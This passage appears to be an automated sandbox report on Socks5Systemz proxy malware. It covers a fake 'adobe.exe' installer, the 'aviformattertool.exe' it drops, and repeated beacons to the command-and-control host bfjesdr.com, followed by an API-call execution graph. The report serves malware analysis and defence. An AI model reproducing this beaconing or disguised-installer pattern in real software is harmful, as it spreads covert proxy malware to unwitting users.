User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:57.502969027 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 49826 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:57.810183048 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:58.026194096 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 49827 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:58.328392029 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:58.550244093 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 49828 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:58.857187033 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:59.074208021 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 49829 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:59.387161970 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:33:59.609313011 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:33:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 49830 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:33:59.918338060 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:34:00.140093088 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:34:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 49831 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:34:00.448271990 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:34:00.664535999 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:34:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 49832 | 185.196.8.22 | 80 | 7388 | C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:34:00.979515076 CET | 326 | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:34:01.200164080 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:34:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID: 95
Source IP: 192.168.2.4
Source Port: 49833
Destination IP: 185.196.8.22
Destination Port: 80
PID: 7388
Process: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe

Timestamp | Bytes transferred | Direction | Data
Jan 13, 2024 06:34:01.513159037 CET | 326 bytes | OUT | GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
Host: bfjesdr.com
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Jan 13, 2024 06:34:01.729543924 CET | 220 bytes | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 13 Jan 2024 05:34:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:06:31:55
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:4'855'286 bytes
                                                                                                                                                        MD5 hash:E9A2997EE4CFB48CB3988F3048E041E9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:1
                                                                                                                                                        Start time:06:31:55
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp" /SL5="$20466,4603715,54272,C:\Users\user\Desktop\adobe.exe"
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:704'512 bytes
                                                                                                                                                        MD5 hash:EAF0354C6EA59246416F73EC28FB11AF
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

                                                                                                                                                        Target ID:2
                                                                                                                                                        Start time:06:31:56
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -i
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'757'184 bytes
                                                                                                                                                        MD5 hash:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Antivirus matches:
                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:3
                                                                                                                                                        Start time:06:31:56
                                                                                                                                                        Start date:13/01/2024
                                                                                                                                                        Path:C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe" -s
                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                        File size:1'757'184 bytes
                                                                                                                                                        MD5 hash:354540FAD1E406C119F19FC2499E892C
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2904685361.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:false

Execution Graph

Execution Coverage: 21.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.5%
Total number of Nodes: 1461
Total number of Limit Nodes: 18
5586 406638 5585->5586 5587 406642 5586->5587 5588 406665 5586->5588 5881 406950 5587->5881 5589 40322c 4 API calls 5588->5589 5591 40666e 5589->5591 5591->5532 5592 406649 5592->5588 5593 406654 5592->5593 5594 403340 18 API calls 5593->5594 5595 406662 5594->5595 5595->5532 5597 403344 5596->5597 5598 4033a5 5596->5598 5599 40334c 5597->5599 5601 4031e8 5597->5601 5599->5598 5602 4031e8 18 API calls 5599->5602 5605 40335b 5599->5605 5600 403228 5600->5534 5604 403254 18 API calls 5601->5604 5606 4031fc 5601->5606 5602->5605 5603 403254 18 API calls 5608 403375 5603->5608 5604->5606 5605->5603 5606->5600 5607 4025ac 4 API calls 5606->5607 5607->5600 5609 4031e8 18 API calls 5608->5609 5610 4033a1 5609->5610 5610->5534 5612 403154 4 API calls 5611->5612 5613 402f29 5612->5613 5887 402bcc 5613->5887 5615 402f51 5615->5615 5617 408da8 18 API calls 5616->5617 5618 408df4 5617->5618 5618->5522 5620 405859 5619->5620 5621 405930 19 API calls 5620->5621 5622 40586b 5621->5622 5622->5622 5629 40955b 5623->5629 5624 409590 5626 40959d GetUserDefaultLangID 5624->5626 5631 409592 5624->5631 5625 409594 5641 407024 GetModuleHandleA GetProcAddress 5625->5641 5626->5631 5629->5624 5629->5625 5630 40956f 5629->5630 5635 409884 5630->5635 5631->5630 5632 4095cb GetACP 5631->5632 5633 4095ef 5631->5633 5632->5630 5632->5631 5633->5630 5634 409615 GetACP 5633->5634 5634->5630 5634->5633 5636 40988c 5635->5636 5640 4098c6 5635->5640 5637 403420 18 API calls 5636->5637 5636->5640 5638 4098c0 5637->5638 5699 408e80 5638->5699 5640->5517 5642 407067 5641->5642 5643 40705e 5641->5643 5644 407070 5642->5644 5645 4070a8 5642->5645 5654 403198 4 API calls 5643->5654 5662 406f68 5644->5662 5647 406f68 RegOpenKeyExA 5645->5647 5648 4070c1 5647->5648 5650 4070de 5648->5650 5651 406f5c 20 API calls 5648->5651 5649 407089 5649->5650 5665 406f5c 5649->5665 5652 40322c 4 API calls 5650->5652 5655 4070d5 RegCloseKey 5651->5655 5656 4070eb 5652->5656 5658 407120 5654->5658 5655->5650 5668 4032fc 
5656->5668 5659 403198 4 API calls 5658->5659 5661 407128 5659->5661 5661->5631 5663 406f73 5662->5663 5664 406f79 RegOpenKeyExA 5662->5664 5663->5664 5664->5649 5682 406e10 5665->5682 5669 403300 5668->5669 5670 40333f 5668->5670 5671 40330a 5669->5671 5677 4031e8 5669->5677 5670->5643 5672 403334 5671->5672 5673 40331d 5671->5673 5676 4034f0 18 API calls 5672->5676 5674 4034f0 18 API calls 5673->5674 5681 403322 5674->5681 5675 403228 5675->5643 5676->5681 5678 403254 18 API calls 5677->5678 5679 4031fc 5677->5679 5678->5679 5679->5675 5680 4025ac 4 API calls 5679->5680 5680->5675 5681->5643 5683 406e36 RegQueryValueExA 5682->5683 5684 406e7b 5683->5684 5689 406e59 5683->5689 5686 403198 4 API calls 5684->5686 5685 406e73 5687 403198 4 API calls 5685->5687 5688 406f47 RegCloseKey 5686->5688 5687->5684 5688->5650 5689->5684 5689->5685 5690 403278 18 API calls 5689->5690 5691 403420 18 API calls 5689->5691 5690->5689 5692 406eb0 RegQueryValueExA 5691->5692 5692->5683 5693 406ecc 5692->5693 5693->5684 5694 4034f0 18 API calls 5693->5694 5695 406f0e 5694->5695 5696 406f20 5695->5696 5698 403420 18 API calls 5695->5698 5697 4031e8 18 API calls 5696->5697 5697->5684 5698->5696 5700 408e8e 5699->5700 5702 408ea6 5700->5702 5712 408e18 5700->5712 5703 408e18 18 API calls 5702->5703 5704 408eca 5702->5704 5703->5704 5705 407918 InterlockedExchange 5704->5705 5706 408ee5 5705->5706 5707 408e18 18 API calls 5706->5707 5708 408ef8 5706->5708 5707->5708 5709 408e18 18 API calls 5708->5709 5710 403278 18 API calls 5708->5710 5711 408f27 5708->5711 5709->5708 5710->5708 5711->5640 5713 405880 18 API calls 5712->5713 5714 408e29 5713->5714 5714->5702 5764 406a58 5715->5764 5718 406d26 5720 406a58 19 API calls 5718->5720 5722 406d72 5718->5722 5721 406d36 5720->5721 5723 406d42 5721->5723 5725 406a34 21 API calls 5721->5725 5772 406888 5722->5772 5723->5722 5726 406a58 19 API calls 5723->5726 5735 406d67 5723->5735 5725->5723 5729 406d5b 5726->5729 5732 406a34 21 API calls 
5729->5732 5729->5735 5730 406638 19 API calls 5731 406d87 5730->5731 5733 40322c 4 API calls 5731->5733 5732->5735 5734 406d91 5733->5734 5736 4031b8 4 API calls 5734->5736 5735->5722 5784 406cc8 GetWindowsDirectoryA 5735->5784 5737 406dab 5736->5737 5737->5554 5739 409244 5738->5739 5740 406638 19 API calls 5739->5740 5741 40925d 5740->5741 5742 40322c 4 API calls 5741->5742 5749 409268 5742->5749 5743 406978 20 API calls 5743->5749 5745 4033b4 18 API calls 5745->5749 5746 408dd8 18 API calls 5746->5749 5748 405880 18 API calls 5748->5749 5749->5743 5749->5745 5749->5746 5749->5748 5750 4092e4 5749->5750 5824 4091b0 5749->5824 5832 409034 5749->5832 5751 40322c 4 API calls 5750->5751 5752 4092ef 5751->5752 5753 4031b8 4 API calls 5752->5753 5754 409309 5753->5754 5755 403198 4 API calls 5754->5755 5756 409311 5755->5756 5756->5554 5758 405198 33 API calls 5757->5758 5759 404ca2 5758->5759 5759->5554 5761 408dc8 5760->5761 5860 408c80 5761->5860 5765 4034f0 18 API calls 5764->5765 5766 406a6b 5765->5766 5767 406a82 GetEnvironmentVariableA 5766->5767 5771 406a95 5766->5771 5786 406dec 5766->5786 5767->5766 5768 406a8e 5767->5768 5769 403198 4 API calls 5768->5769 5769->5771 5771->5718 5781 406a34 5771->5781 5773 403414 5772->5773 5774 4068ab GetFullPathNameA 5773->5774 5775 4068b7 5774->5775 5776 4068ce 5774->5776 5775->5776 5777 4068bf 5775->5777 5778 40322c 4 API calls 5776->5778 5779 403278 18 API calls 5777->5779 5780 4068cc 5778->5780 5779->5780 5780->5730 5790 4069dc 5781->5790 5785 406ce9 5784->5785 5785->5722 5787 406dfa 5786->5787 5788 4034f0 18 API calls 5787->5788 5789 406e08 5788->5789 5789->5766 5797 406978 5790->5797 5792 4069fe 5793 406a06 GetFileAttributesA 5792->5793 5794 406a1b 5793->5794 5795 403198 4 API calls 5794->5795 5796 406a23 5795->5796 5796->5718 5807 406744 5797->5807 5799 4069b0 5802 4069c6 5799->5802 5803 4069bb 5799->5803 5801 406989 5801->5799 5814 406970 CharPrevA 5801->5814 5815 403454 5802->5815 5804 40322c 4 API calls 5803->5804 
5806 4069c4 5804->5806 5806->5792 5811 406755 5807->5811 5808 4067b9 5809 4067b4 5808->5809 5810 406680 IsDBCSLeadByte 5808->5810 5809->5801 5810->5809 5811->5808 5812 406773 5811->5812 5812->5809 5822 406680 IsDBCSLeadByte 5812->5822 5814->5801 5816 403486 5815->5816 5817 403459 5815->5817 5818 403198 4 API calls 5816->5818 5817->5816 5820 40346d 5817->5820 5819 40347c 5818->5819 5819->5806 5821 403278 18 API calls 5820->5821 5821->5819 5823 406694 5822->5823 5823->5812 5825 403198 4 API calls 5824->5825 5827 4091d1 5825->5827 5829 4091fe 5827->5829 5841 4032a8 5827->5841 5844 403494 5827->5844 5830 403198 4 API calls 5829->5830 5831 409213 5830->5831 5831->5749 5848 408f70 5832->5848 5834 40904a 5835 40904e 5834->5835 5854 406a48 5834->5854 5835->5749 5838 409081 5857 408fac 5838->5857 5842 403278 18 API calls 5841->5842 5843 4032b5 5842->5843 5843->5827 5845 4034c3 5844->5845 5846 403498 5844->5846 5845->5827 5847 4034f0 18 API calls 5846->5847 5847->5845 5849 408f7a 5848->5849 5850 408f7e 5848->5850 5849->5834 5851 408fa0 SetLastError 5850->5851 5852 408f87 Wow64DisableWow64FsRedirection 5850->5852 5853 408f9b 5851->5853 5852->5853 5853->5834 5855 4069dc 21 API calls 5854->5855 5856 406a52 GetLastError 5855->5856 5856->5838 5858 408fb1 Wow64RevertWow64FsRedirection 5857->5858 5859 408fbb 5857->5859 5858->5859 5859->5749 5861 403198 4 API calls 5860->5861 5864 408cb1 5860->5864 5861->5864 5862 408cdc 5863 4031b8 4 API calls 5862->5863 5865 408d69 5863->5865 5864->5862 5866 408cc8 5864->5866 5867 403278 18 API calls 5864->5867 5869 4032fc 18 API calls 5864->5869 5865->5554 5868 4032fc 18 API calls 5866->5868 5867->5864 5868->5862 5869->5864 5871 406744 IsDBCSLeadByte 5870->5871 5873 406835 5871->5873 5872 40687f 5872->5572 5873->5872 5874 406680 IsDBCSLeadByte 5873->5874 5874->5873 5876 4068f3 5875->5876 5877 406820 IsDBCSLeadByte 5876->5877 5880 4068fe 5877->5880 5878 4066ea 5878->5577 5878->5578 5879 406680 IsDBCSLeadByte 5879->5880 5880->5878 5880->5879 5882 
406957 5881->5882 5883 40695b 5881->5883 5882->5592 5886 406970 CharPrevA 5883->5886 5885 40696c 5885->5592 5886->5885 5888 402bd5 RaiseException 5887->5888 5889 402be6 5887->5889 5888->5889 5889->5615 6142 402e64 6143 402e69 6142->6143 6144 402e7a RtlUnwind 6143->6144 6145 402e5e 6143->6145 6146 402e9d 6144->6146 6163 40667c IsDBCSLeadByte 6164 406694 6163->6164 6668 403f7d 6669 403fa2 6668->6669 6672 403f84 6668->6672 6671 403e8e 4 API calls 6669->6671 6669->6672 6670 403f8c 6671->6672 6672->6670 6673 402674 4 API calls 6672->6673 6674 403fca 6673->6674 6681 403d02 6683 403d12 6681->6683 6682 403ddf ExitProcess 6683->6682 6684 403db8 6683->6684 6688 403dea 6683->6688 6691 403da4 6683->6691 6692 403d8f MessageBoxA 6683->6692 6685 403cc8 4 API calls 6684->6685 6686 403dc2 6685->6686 6687 403cc8 4 API calls 6686->6687 6689 403dcc 6687->6689 6701 4019dc 6689->6701 6697 403fe4 6691->6697 6692->6684 6693 403dd1 6693->6682 6693->6688 6698 403fe8 6697->6698 6699 403f07 4 API calls 6698->6699 6700 404006 6699->6700 6702 401abb 6701->6702 6703 4019ed 6701->6703 6702->6693 6704 401a04 RtlEnterCriticalSection 6703->6704 6705 401a0e LocalFree 6703->6705 6704->6705 6706 401a41 6705->6706 6707 401a2f VirtualFree 6706->6707 6708 401a49 6706->6708 6707->6706 6709 401a70 LocalFree 6708->6709 6710 401a87 6708->6710 6709->6709 6709->6710 6711 401aa9 RtlDeleteCriticalSection 6710->6711 6712 401a9f RtlLeaveCriticalSection 6710->6712 6711->6693 6712->6711 6173 404206 6174 4041cc 6173->6174 6177 40420a 6173->6177 6175 404282 6176 403154 4 API calls 6178 404323 6176->6178 6177->6175 6177->6176 6179 402c08 6182 402c82 6179->6182 6183 402c19 6179->6183 6180 402c56 RtlUnwind 6181 403154 4 API calls 6180->6181 6181->6182 6183->6180 6183->6182 6186 402b28 6183->6186 6187 402b31 RaiseException 6186->6187 6188 402b47 6186->6188 6187->6188 6188->6180 6189 408c10 6190 408c17 6189->6190 6191 403198 4 API calls 6190->6191 6199 408cb1 6191->6199 6192 408cdc 6193 4031b8 4 API calls 6192->6193 6194 
408d69 6193->6194 6195 408cc8 6197 4032fc 18 API calls 6195->6197 6196 403278 18 API calls 6196->6199 6197->6192 6198 4032fc 18 API calls 6198->6199 6199->6192 6199->6195 6199->6196 6199->6198 6200 40a011 6201 40a036 6200->6201 6202 407918 InterlockedExchange 6201->6202 6203 40a060 6202->6203 6204 40a070 6203->6204 6205 409aa0 18 API calls 6203->6205 6210 4076ac SetEndOfFile 6204->6210 6205->6204 6207 40a08c 6208 4025ac 4 API calls 6207->6208 6209 40a0c3 6208->6209 6211 4076c3 6210->6211 6212 4076bc 6210->6212 6211->6207 6213 40748c 35 API calls 6212->6213 6213->6211 6717 409916 6718 409918 6717->6718 6719 409956 CallWindowProcA 6718->6719 6720 40993a 6718->6720 6719->6720 5941 407017 5942 407008 SetErrorMode 5941->5942 6218 403018 6219 403070 6218->6219 6220 403025 6218->6220 6221 40302a RtlUnwind 6220->6221 6222 40304e 6221->6222 6224 402f78 6222->6224 6225 402be8 6222->6225 6226 402bf1 RaiseException 6225->6226 6227 402c04 6225->6227 6226->6227 6227->6219 6727 409918 6728 40993a 6727->6728 6730 409927 6727->6730 6729 409956 CallWindowProcA 6729->6728 6730->6728 6730->6729 6232 40901e 6233 409010 6232->6233 6234 408fac Wow64RevertWow64FsRedirection 6233->6234 6235 409018 6234->6235 6236 409020 SetLastError 6237 409029 6236->6237 6248 403a28 ReadFile 6249 403a46 6248->6249 6250 403a49 GetLastError 6248->6250 6079 40762c ReadFile 6080 407663 6079->6080 6081 40764c 6079->6081 6082 407652 GetLastError 6081->6082 6083 40765c 6081->6083 6082->6080 6082->6083 6084 40748c 35 API calls 6083->6084 6084->6080 6255 40a02c 6256 409aa0 18 API calls 6255->6256 6257 40a031 6256->6257 6258 40a036 6257->6258 6259 402f24 5 API calls 6257->6259 6260 407918 InterlockedExchange 6258->6260 6259->6258 6261 40a060 6260->6261 6262 40a070 6261->6262 6263 409aa0 18 API calls 6261->6263 6264 4076ac 36 API calls 6262->6264 6263->6262 6265 40a08c 6264->6265 6266 4025ac 4 API calls 6265->6266 6267 40a0c3 6266->6267 6731 40712e 6732 407118 6731->6732 6733 403198 4 API calls 6732->6733 6734 
407120 6733->6734 6735 403198 4 API calls 6734->6735 6736 407128 6735->6736 6737 408f30 6740 408dfc 6737->6740 6741 408e05 6740->6741 6742 403198 4 API calls 6741->6742 6743 408e13 6741->6743 6742->6741 6744 403932 6745 403924 6744->6745 6748 40374c 6745->6748 6747 40392c 6749 403766 6748->6749 6750 403759 6748->6750 6749->6747 6750->6749 6751 403779 VariantClear 6750->6751 6751->6747 5890 4075c4 SetFilePointer 5891 4075f7 5890->5891 5892 4075e7 GetLastError 5890->5892 5892->5891 5893 4075f0 5892->5893 5894 40748c 35 API calls 5893->5894 5894->5891 6268 405ac4 6269 405ad4 6268->6269 6270 405acc 6268->6270 6271 405ad2 6270->6271 6272 405adb 6270->6272 6275 405a3c 6271->6275 6273 405930 19 API calls 6272->6273 6273->6269 6276 405a44 6275->6276 6277 405a5e 6276->6277 6278 403154 4 API calls 6276->6278 6279 405a63 6277->6279 6280 405a7a 6277->6280 6278->6276 6281 405930 19 API calls 6279->6281 6282 403154 4 API calls 6280->6282 6283 405a76 6281->6283 6284 405a7f 6282->6284 6286 403154 4 API calls 6283->6286 6285 4059a0 33 API calls 6284->6285 6285->6283 6287 405aa8 6286->6287 6288 403154 4 API calls 6287->6288 6289 405ab6 6288->6289 6289->6269 6290 4076c8 WriteFile 6291 4076e8 6290->6291 6293 4076ef 6290->6293 6294 40748c 35 API calls 6291->6294 6292 407700 6293->6292 6295 4073ec 34 API calls 6293->6295 6294->6293 6295->6292 6296 40a2ca 6305 4096fc 6296->6305 6299 402f24 5 API calls 6300 40a2d4 6299->6300 6301 403198 4 API calls 6300->6301 6302 40a2f3 6301->6302 6303 403198 4 API calls 6302->6303 6304 40a2fb 6303->6304 6314 40569c 6305->6314 6307 409745 6311 403198 4 API calls 6307->6311 6308 409717 6308->6307 6320 40720c 6308->6320 6310 409735 6313 40973d MessageBoxA 6310->6313 6312 40975a 6311->6312 6312->6299 6313->6307 6315 403154 4 API calls 6314->6315 6316 4056a1 6315->6316 6317 4056b9 6316->6317 6318 403154 4 API calls 6316->6318 6317->6308 6319 4056af 6318->6319 6319->6308 6321 40569c 4 API calls 6320->6321 6322 40721b 6321->6322 6323 407221 6322->6323 6324 
